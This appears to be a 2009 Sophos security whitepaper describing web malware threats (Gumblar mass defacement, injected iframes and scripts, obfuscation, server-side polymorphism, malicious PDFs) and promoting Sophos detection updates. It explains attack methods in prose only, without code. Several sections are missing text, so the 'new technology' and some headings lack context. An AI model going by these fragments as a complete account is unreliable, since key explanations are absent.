The internet is now the number-one conduit for infecting users with malware. SophosLabs reports that in 2009, 23,500 new infected web pages are discovered every day. That’s one every four seconds or so, four times worse than what it was in the same period in 2008 1. Malware authors are very successful with a popular method: compromising popular, high-traffic, legitimate sites in order to kick-start the infection process 2.
Users visiting a hijacked site have no way of knowing the site has been compromised because the malicious code is invisible but executed as soon as the page loads in the user’s browser. The code typically will utilize cross-site scripting to fetch an even more malicious payload from a third-party site that will then attempt to leverage one of dozens of known exploits in the browser or operating system to infect it, steal data or subvert it into a botnet.
The scope of these attacks cannot be underestimated, since all types of sites — from government websites to educational establishments to popular news portals, blogs and social networking sites — have been targeted.
A simple illustration of this is shown in Figure 1. In A, the page has been injected with a simple HTML iframe, which would cause the browser to load malicious content from the specific remote site when that page is viewed.
Figure 1: Simple example of a web page compromised in different ways, but where the payload is exactly the same. The injected iframe (A) and script (B) cause the browser to load content from the malicious remote site when the page is browsed.
A good example of this attack is known as Gumblar 3, in which many sites were injected with a malicious script that used simple character substitution to hide its payload (Figure 2A). As you can see, the payload is not visible in the injected script. But after manual deobfuscation, the payload is obvious (Figure 2B)—loading of a malicious script from a remote site.
Figure 2: Malicious script (A) injected into legitimate pages as part of the Gumblar mass-defacement attacks during 2009. The manually deobfuscated script is shown in (B).
The reach of mass-defacement attacks like such as Gumblar can be huge. Very quickly after adding detection (as Troj/JSRedir-R), that threat quickly rose to the top position in SophosLabs’ web threat stats, dwarfing other threats at that time (Figure 3).
Figure 3: Top web threats detected between May 6 and 13, 2009. Troj/JSRedir-R (aka Gumblar) dwarfs all other detections at >40% of total reports.
Commercial script packers
- Protection of intellectual property: Users may choose to use such tools to obfuscate their code in an attempt to prevent others from copying it.
- Efficiency: Some tools can produce smaller scripts that are quicker to download, resulting in more responsive sites.
This creates yet another problem for analysts and content scanners. When attackers use commercial tools to obfuscate their malicious scripts, anti-malware analysts have to be careful not to generate a false positive on legitimate scripts that are obfuscated with the same tool 4.
Server-side polymorphism (SSP)
Many of today’s threats also use advanced scripting techniques on the server in order to create polymorphic malicious code. For example, during 2009, SophosLabs identified several attacks aiming to infect users with Zbot 5,6 that were aggressively using SSP. In these attacks, the malicious scripts being used to exploit vulnerabilities on user machines were dynamically created on the server, resulting in a slightly different script on each request.
SSP is essentially a special case of obfuscation, which again poses a challenge to anti-malware analysts and content scanners.
Malicious PDF documents
The key benefits of this new technology to Sophos customers are:
- Increased detection rates of malicious script content and PDFs
- Increased proactive (zero-day) protection against new attacks
In November 2009, Sophos Web Security and Control will include this functionality in the core anti-malware engine. This update will be rolled out to all customer appliances as part of the monthly update package (no additional work will be necessary).
From early 2010, the technology will be included in the Browser Helper Object (BHO) component of Sophos Endpoint Security and Data Protection, which runs and protects Internet Explorer from processing any malware in requests.
To learn more about Sophos please visit: http://www.sophos.com